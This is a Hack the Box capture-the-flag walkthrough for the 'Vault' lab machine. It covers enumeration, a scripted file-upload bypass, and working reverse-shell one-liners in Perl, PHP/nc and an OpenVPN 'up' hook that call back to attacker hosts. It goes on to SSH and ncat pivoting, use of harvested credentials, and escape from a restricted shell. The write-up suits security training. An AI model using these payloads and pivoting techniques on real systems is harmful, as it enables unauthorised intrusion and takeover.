Hack the Box – Vault Walkthrough

Today we’re going to solve another CTF machine “Vault“. It is now retired box and can be accessible if you’re a VIP member.
Specifications
- Target OS: Linux
- IP Address: 10.10.10.109
- Difficulty: Medium
Contents
- Getting user
- Getting root
Reconnaissance
As always, the first step consists of reconnaissance phase as port scanning.
Ports Scanning
During this step we’re gonna identify the target to see what we have behind the IP Address.
nmap -sS -sU -T4 -A -v 10.10.10.109
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a6:9d:0f:7d:73:75:bb:a8:94:0a:b7:e3:fe:1f:24:f4 (RSA) | 256 2c:7c:34:eb:3a:eb:04:03:ac:48:28:54:09:74:3d:27 (ECDSA) |_ 256 98:42:5f:ad:87:22:92:6d:72:e6:66:6c:82:c1:09:83 (EdDSA) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Enumeration
Let’s browse the URL http://10.10.10.109/
As the page mention Sparklays let’s check if there’s a directory under that name.
http://10.10.10.109/sparklays/
Now, we know that we have some hidden stuff let’s enumerate directory using dirbuster.
Dirbuster
We found admin.php, login.php and another 403 directory /sparklays/design/ let’s dig more into design directory first.
WFuzz
We’re going to use Cewl to generate the wordlists based upon the words you found on the website.
cewl http://10.10.10.109/ | tr '[:upper:]' '[:lower:]' > words.txt
Now, let’s enumerate for directories using WFuzz.
wfuzz -c -w words.txt --hc 404 http://10.10.10.109/FUZZ
Let’s enumerate more into ‘sparklays’ directory using wfuzz.
wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -R2 --hc 404 --hl 11 http://10.10.10.109/sparklays/FUZZ
GoBuster
gobuster -u http://10.10.10.109/sparklays/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 50 2>/dev/null
Now we’re talking!
We can start uploading with something which is not an image to see which file extension restrictions it has or we can use simple bash script to automate this process.
File Upload Bypass
The wordlist is derived from /etc/mime.types
like so.
awk '{ $1 = ""; print $0 }' /etc/mime.types | sed -r -e 's/^ //g' -e '1,26d' -e '/^$/d' | tr ' ' '\n' > extensions.txt
script.sh
#!/bin/bash EXT=$1 HOST=10.10.10.109 URL=http://$HOST/sparklays/design/changelogo.php UPLOADS=http://$HOST/sparklays/design/uploads curl -s \ -F "[email protected];filename=info.${EXT}" \ -F "submit=upload+file" \ $URL \ | sed '1!d' \ | cut -d '<' -f1 \ | grep success &>/dev/null && echo "[+] Uploaded: $UPLOADS/info.${EXT}"
time parallel -j40 ./script.sh {} < extensions.txt
[+] Uploaded: http://10.10.10.109/sparklays/design/uploads/info.php5 [+] Uploaded: http://10.10.10.109/sparklays/design/uploads/info.gif [+] Uploaded: http://10.10.10.109/sparklays/design/uploads/info.jpeg [+] Uploaded: http://10.10.10.109/sparklays/design/uploads/info.jpg [+] Uploaded: http://10.10.10.109/sparklays/design/uploads/info.png [+] Uploaded: http://10.10.10.109/sparklays/design/uploads/info.csv
Look’s like we can upload php using php5 extension.
Now, we can easily spawn a reverse shell.
cat code.sh #!/bin/bash HOST=10.10.10.109 URL=http://$HOST/sparklays/design/changelogo.php UPLOADS=http://$HOST/sparklays/design/uploads curl -s \ -F "[email protected]" \ -F "submit=upload+file" \ $URL \ | grep success &>/dev/null && echo "[+] Uploaded [+]" ./code.sh [+] Uploaded [+]
Let’s get a proper reverse shell now!
perl -e 'use Socket;$i="10.10.14.9";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
OR
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f"); ?>
Reverse Shell Cheat Sheet
Start up the listener.
Awesome we have a shell now, let’s move towards getting a fully interactive tty shell.
Upgrading simple shells to fully interactive TTYs
After doing some enumeration you can find interesting files in /home/dave/Desktop.
$ ls -la /home/dave/Desktop total 20 drwxr-xr-x 2 dave dave 4096 Sep 3 06:51 . drwxr-xr-x 18 dave dave 4096 Sep 3 08:34 .. -rw-rw-r-- 1 alex alex 74 Jul 17 2018 Servers -rw-rw-r-- 1 alex alex 14 Jul 17 2018 key -rw-rw-r-- 1 alex alex 20 Jul 17 2018 ssh
Here’s what they include. In Servers we have network information and inside key and ssh we have i believe ssh creds.
[email protected]:~/dave/Desktop$ cat Servers DNS + Configurator - 192.168.122.4 Firewall - 192.168.122.5 The Vault - x [email protected]:~/dave/Desktop$ cat key itscominghome [email protected]:~/dave/Desktop$ cat ssh dave Dav3therav3123
Let’s try ssh [email protected] with password: Dav3therav3123
Now we can take a look at network information which we found. lets type ifconfig and check.
Notice that the host has many virtual network interfaces. One of them links to virtual bridge 192.168.122.0/24
.
DNS
Let’s scan for open ports 192.168.122.4 to see what we’re up against.
[email protected]:~$ for p in $(seq 1 10000); do (nc -w1 -nvz 192.168.122.4 $p 2>&1 | grep succeed); done Connection to 192.168.122.4 22 port [tcp/*] succeeded! Connection to 192.168.122.4 80 port [tcp/*] succeeded! [email protected]:~$ nc -zv 192.168.122.4 1-65535 2>&1 | grep succeeded Connection to 192.168.122.4 22 port [tcp/ssh] succeeded! Connection to 192.168.122.4 80 port [tcp/http] succeeded!
We can see SSH and HTTP ports are opened in 192.168.122.4 but since, we don’t have curl installed on dave machine. we’re gonna port forward and enumerate on our machine.
SSH Port Forwarding
man ssh: -L [bind_address:]port:host:hostport
ssh -L 8000:192.168.122.4:80 [email protected]
Now, let’s navigate to localhost:8000 to see what we got on port 80.
Dynamic SSH Port Forwarding
man ssh: -f To request ssh to go background. -N Do not execute a remote command. -D Dynamic port forwarding.
ssh -D9999 [email protected] -f -N 2>/dev/null
FoxyProxy socks5://127.0.0.1:9999.
ProxyChains
Let’s setup proxychains with dynamic SSH port forwarding to make our enumeration process more easier to use tools.
ssh -fND 1337 [email protected]
Let’s modify /etc/proxychains.conf & add socks5 127.0.0.1 1337
Now, let’s scan for opened ports using nmap.
proxychains nmap -sT 192.168.122.4 -Pn
Now, i’m using SSH Port forwarding and using Foxy-proxy addon.
Let’s enumerate more and find hidden directories.
Directory Enumeration
WFuzz
wfuzz -w /opt/SecLists/Discovery/Web-Content/common.txt --hc '403,404' --hw '35' -t 20 http://localhost:8000/FUZZ
We found a directory called notes and it indicates two files which exists in the root of localhost:8000/123.ovpn and script.sh.
123.ovpn
curl -i 'http://localhost:8000/123.ovpn' && echo HTTP/1.1 200 OK Date: Thu, 18 Apr 2019 12:40:05 GMT Server: Apache/2.4.18 (Ubuntu) Last-Modified: Sun, 02 Sep 2018 14:21:46 GMT ETag: "79-574e4250e6860" Accept-Ranges: bytes Content-Length: 121 remote 192.168.122.1 dev tun nobind script-security 2 up "/bin/bash -c 'bash -i >& /dev/tcp/192.168.122.1/2323 0>&1'"
script.sh
curl -i 'http://localhost:8000/script.sh' && echo HTTP/1.1 200 OK Date: Thu, 18 Apr 2019 12:40:12 GMT Server: Apache/2.4.18 (Ubuntu) Last-Modified: Tue, 17 Jul 2018 09:50:24 GMT ETag: "23-5712edffeb800" Accept-Ranges: bytes Content-Length: 35 Content-Type: text/x-sh #!/bin/bash sudo openvpn 123.ovpn
The .ovpn
file it’s the one we can edit and run in /vpnconfig.php
.
Now, setup the listener on dave SSH machine.
We got root shell to DNS. User flag is inside /home/dave/.
There’s a SSH file /home/dave/ssh But we don’t know where this could be used.
Password: dav3gerous567
It look’s like we found the SSH credential for 192.168.122.4 which is [email protected] and we can upgrade our reverse shell to SSH. Let’s exit from reverse shell and login to SSH.
[email protected]:~$ ssh [email protected] [email protected]'s password: dav3gerous567 Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-116-generic i686) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 98 packages can be updated. 50 updates are security updates. Last login: Mon Sep 3 16:38:03 2018 [email protected]:~$
Now, we’re in the dave DNS proper way. Before we had to spawn a reverse shell through VPN configurator.
Since, we’re enumerating network of this machine let’s do some digging.
We discovered DNS has access to 192.168.5.0/24
through the firewall at 192.168.122.5
. Check out the routing table.
[email protected]:/home/dave# route -n route -n Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 192.168.5.0 192.168.122.5 255.255.255.0 UG 0 0 0 ens3 192.168.122.0 0.0.0.0 255.255.255.0 U 0 0 0 ens3
We still haven’t found the vault host yet. but i think it should be inside 192.168.5.0/24 subnet.
If we check /etc/hosts file we can see the IP of our target machine which is 192.168.5.2.
[email protected]:~$ cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 DNS 192.168.5.2 Vault # The following lines are desirable for IPv6 capable hosts ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters
Let’s check logs and grep for string ‘192.168.5.’ inside those files.
find /var/log -type f -exec grep -Hina '192.168.5.' {} \;
/var/log/auth.log:1376:Sep 2 15:07:51 DNS sudo: dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f /var/log/auth.log:1381:Sep 2 15:10:20 DNS sudo: dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 1234 --sh-exec ncat 192.168.5.2 987 -p 53 /var/log/auth.log:1383:Sep 2 15:10:34 DNS sudo: dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 3333 --sh-exec ncat 192.168.5.2 987 -p 53
We found something interesting firewall accepting inbound traffic from port 4444 to host 192.168.5.2 which is listening on port 987.
Let’s find out what’s running on port 987.
[email protected]:~$ ncat -p 4444 192.168.5.2 987 SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
Let’s find out what’s behind that port 4444 on our vault machine.
[email protected]:~$ nmap 192.168.5.2 -Pn --source-port=4444 -f Sorry, but fragscan requires root privileges. QUITTING!
It look’s like we need root privilege let’s check sudo -l
[email protected]:~$ sudo -l [sudo] password for dave: Matching Defaults entries for dave on DNS: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User dave may run the following commands on DNS: (ALL : ALL) ALL
I think we can use sudo with nmap.
[email protected]:~$ sudo nmap 192.168.5.2 -Pn --source-port=4444 -f Starting Nmap 7.01 ( https://nmap.org ) at 2019-04-18 16:58 BST mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers Nmap scan report for Vault (192.168.5.2) Host is up (0.0028s latency). Not shown: 999 closed ports PORT STATE SERVICE 987/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 15.45 seconds
Nothing interesting comes up.
To access Vault from Kali, we’ll need to set up another tunnel. Additionally, we’ll need to set up a netcat relay like the ones we found in the logs. Let’s start with the tunnel.
SSH comes with a slew of options, particularly the ProxyCommand option allows ssh
to proxy traffic through a network utility tool like ncat
.
[email protected]:~$ ssh -o 'ProxyCommand ncat -p 4444 %h %p' -p 987 [email protected] -t 'bash -i' [email protected]'s password: dav3gerous567 [email protected]:~$ id uid=1001(dave) gid=1001(dave) groups=1001(dave) [email protected]:~$
We got vault! Let’s change the SHELL environment variables.
[email protected]:~$ echo $SHELL /bin/rbash [email protected]:~$ export SHELL=/bin/bash:$SHELL [email protected]:~$ bash [email protected]:~$ export SHELL=/bin/bash:$SHELL OR [email protected]:~$ ssh [email protected] -p 1234 -t "bash --noprofile"
Our root flag is encrypted.
Root File Decryption
[email protected]:~$ ls root.txt.gpg [email protected]:~$ file root.txt.gpg root.txt.gpg: PGP RSA encrypted session key - keyid: 10C678C7 31FEBD1 RSA (Encrypt or Sign) 4096b .
To decrypt the file we need a private key and a password.
We found a private key inside /home/dave/.gnupg/secring.gpg [email protected]
[email protected]:~$ gpg --list-secret-keys /home/dave/.gnupg/secring.gpg ----------------------------- sec 4096R/0FDFBFE4 2018-07-24 uid david <[email protected]> ssb 4096R/D1EB1F03 2018-07-24
Let’s convert into base64 encoded string using python3m.
[email protected]:~$ python3m -c "import base64;print(base64.b64encode(open('root.txt.gpg', 'rb').read()))" b'hQIMA8d4xhDR6x8DARAAoJjq0xo2bn5JfY3Q6EMVZjkwUK7JPcwUEr1RNUx98k41oOFdtugxUjwHSZ9x9BU9sph696HhlKlPO0au7DeFyxqPFbjR2CdwoT9PBf8vuSEzEqVltvAq31jQbXpUSA2AxYSj3fWKCAkIPcUBTTcJAnac0EMmXlAQzdAmvFEU+9BRkcpJDSpYV8W2IQf+fsnh14hcc5tXZQZX0mPtLlwYVlJq4xgpV3znnJrrlUgKJqkqhq1i2/JEAL5Ul1k5as9Ha1N8KffjmfEsrRQl8TS5NLoC3mVp3w90X0LYhyDcRz7HPzXfdPMdM+G9NEX1zY4c6cr1sxOdLcpUwbZ4itd7XjCA71B23Ncd7eniLGCkErDaVkZh8oa4DyIG78bxqFTDgk6XrH6pz9XRXhDBSZnCezI90WkbxGecOB42cAOwGkuHcnSF44eXDT60Yl9h6bvRZVEQF3/39ee+nMaW5b5PnWzGb/PC4kT3ZDeWYSiloF6a5sOwDO2CL/qipnAFPj8UthhrCCcQj4rRH2zeeh4y9fh3m3G37Q+U9lNgpjzj0nzVCfjdrMRvUs5itxwpjwaxN6q2q1kxe1DhPCzaAHhLT7We7p2hxdSj1yPgefSzJ39GENgJI1fbTDEaMzwkPra4I2MiJCEVgZnV29oRHPYrmGsfx4tSkBy6tJW342/s88fSZAFwRHa6C9Hrr7GSVucoJ5z2kNKAPnS/cUmBc3OdeJlMxdfzQTMucmv89wwgNgKNLO6wmSFppVRnpmLE+AFoCEqg/JS91N5mVhZPkHwW6V94CxMF/3xqTMKpzBfdERq0MGYij98='
Copy and paste to the ubuntu machine and base64 decode it back.
[email protected]:~/Documents$ echo -n hQIMA8d4xhDR6x8DARAAoJjq0xo2bn5JfY3Q6EMVZjkwUK7JPcwUEr1RNUx98k41oOFdtugxUjwHSZ9x9BU9sph696HhlKlPO0au7DeFyxqPFbjR2CdwoT9PBf8vuSEzEqVltvAq31jQbXpUSA2AxYSj3fWKCAkIPcUBTTcJAnac0EMmXlAQzdAmvFEU+9BRkcpJDSpYV8W2IQf+fsnh14hcc5tXZQZX0mPtLlwYVlJq4xgpV3znnJrrlUgKJqkqhq1i2/JEAL5Ul1k5as9Ha1N8KffjmfEsrRQl8TS5NLoC3mVp3w90X0LYhyDcRz7HPzXfdPMdM+G9NEX1zY4c6cr1sxOdLcpUwbZ4itd7XjCA71B23Ncd7eniLGCkErDaVkZh8oa4DyIG78bxqFTDgk6XrH6pz9XRXhDBSZnCezI90WkbxGecOB42cAOwGkuHcnSF44eXDT60Yl9h6bvRZVEQF3/39ee+nMaW5b5PnWzGb/PC4kT3ZDeWYSiloF6a5sOwDO2CL/qipnAFPj8UthhrCCcQj4rRH2zeeh4y9fh3m3G37Q+U9lNgpjzj0nzVCfjdrMRvUs5itxwpjwaxN6q2q1kxe1DhPCzaAHhLT7We7p2hxdSj1yPgefSzJ39GENgJI1fbTDEaMzwkPra4I2MiJCEVgZnV29oRHPYrmGsfx4tSkBy6tJW342/s88fSZAFwRHa6C9Hrr7GSVucoJ5z2kNKAPnS/cUmBc3OdeJlMxdfzQTMucmv89wwgNgKNLO6wmSFppVRnpmLE+AFoCEqg/JS91N5mVhZPkHwW6V94CxMF/3xqTMKpzBfdERq0MGYij98= | base64 -d > root.txt.gpg [email protected]:~/Documents$ ls root.txt.gpg [email protected]:~/Documents$ gpg --list-secret-keys /home/dave/.gnupg/secring.gpg ----------------------------- sec 4096R/0FDFBFE4 2018-07-24 uid david <[email protected]> ssb 4096R/D1EB1F03 2018-07-24 [email protected]:~/Documents$ gpg -d root.txt.gpg You need a passphrase to unlock the secret key for user: "david <[email protected]>" 4096-bit RSA key, ID D1EB1F03, created 2018-07-24 (main key ID 0FDFBFE4) gpg: encrypted with 4096-bit RSA key, ID D1EB1F03, created 2018-07-24 "david <[email protected]>" ca468370b91d1f5906e310.....